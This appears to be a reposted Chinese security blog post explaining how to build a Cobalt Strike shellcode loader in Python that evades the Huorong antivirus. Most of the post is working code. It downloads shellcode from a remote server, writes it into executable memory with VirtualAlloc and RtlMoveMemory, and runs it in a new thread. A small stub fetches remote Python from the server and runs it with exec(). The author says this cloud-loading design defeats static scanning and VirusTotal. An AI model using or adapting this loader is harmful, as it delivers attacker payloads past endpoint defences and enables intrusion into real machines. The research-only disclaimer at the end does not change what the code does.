关于灵感来自是我之前csgo玩的外挂叫neverlose 其实大多数的nb外挂做的都是云load注入
cs生成python shellcode
然后 shellcode放在公网服务器取名1.txt
import requests
import ctypes
url = "http://ip/2.txt"
response = requests.get(url)
if response.status_code == 200:
variable_names = eval(response.text.strip())
for var_name in variable_names:
globals()[var_name] = None
windll_obj = ctypes.windll
kernel32_obj = windll_obj.kernel32
kernel32_obj.VirtualAlloc.restype = ctypes.c_uint64
func_name = "RtlMoveMemory"
print(f"Variable names: {variable_names}")
print(f"Function name: {func_name}")
move_func = globals().get(variable_names[2], None) # move_func
if move_func is None:
move_func = getattr(kernel32_obj, func_name)
url = "http://ip/1.txt"
response = requests.get(url)
if response.status_code == 200:
shellcode_content = response.text.strip()
shellcode = bytes.fromhex(shellcode_content.replace("\x", ""))
memory_address = kernel32_obj.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
if not memory_address:
raise Exception("VirtualAlloc failed, invalid memory address")
print(f"Memory address allocated: {hex(memory_address)}")
buffer = ctypes.create_string_buffer(shellcode)
try:
move_func(ctypes.c_uint64(memory_address), buffer, len(shellcode))
except Exception as e:
print(f"Error: {e}")
raise
thread_handle = kernel32_obj.CreateThread(0, 0, ctypes.c_uint64(memory_address), 0, 0, 0)
kernel32_obj.WaitForSingleObject(thread_handle, -1)
然后2.txt写报毒的函数
["windll_obj", "kernel32_obj", "move_func"]
具体代码做什么了呢
很简单 为了过静态我们使用云加载 这样把敏感函数和shellcode放在云上不就随便过
实际上动态的测试下只做命令行交互shell也不会报毒,就这么简单
如果调用powershell火绒还是会检测的
这样vt查出来源码爆就是0
所以现在就稍微改动一下
把源代码放到服务器3.txt
import requests
import ctypes
url = "http://ip/2.txt"
response = requests.get(url)
if response.status_code == 200:
variable_names = eval(response.text.strip())
for var_name in variable_names:
globals()[var_name] = None
windll_obj = ctypes.windll
kernel32_obj = windll_obj.kernel32
kernel32_obj.VirtualAlloc.restype = ctypes.c_uint64
func_name = "RtlMoveMemory"
print(f"Variable names: {variable_names}")
print(f"Function name: {func_name}")
move_func = globals().get(variable_names[2], None) # move_func
if move_func is None:
move_func = getattr(kernel32_obj, func_name)
url = "http://ip/1.txt"
response = requests.get(url)
if response.status_code == 200:
shellcode_content = response.text.strip()
shellcode = bytes.fromhex(shellcode_content.replace("\x", ""))
memory_address = kernel32_obj.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
if not memory_address:
raise Exception("VirtualAlloc failed, invalid memory address")
print(f"Memory address allocated: {hex(memory_address)}")
buffer = ctypes.create_string_buffer(shellcode)
try:
move_func(ctypes.c_uint64(memory_address), buffer, len(shellcode))
except Exception as e:
print(f"Error: {e}")
raise
thread_handle = kernel32_obj.CreateThread(0, 0, ctypes.c_uint64(memory_address), 0, 0, 0)
kernel32_obj.WaitForSingleObject(thread_handle, -1)
然后本地就留一个load
import requests
url = "http://ip/3.txt"
response = requests.get(url)
if response.status_code == 200:
remote_code = response.text
print("load:")
print(remote_code)
exec(remote_code)
else:
print(f"Failed : {response.status_code}")
打包出来就把火绒过掉了
原文始发于微信公众号(秋风的安全之路):如何在15分钟内写出cs免杀火绒
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论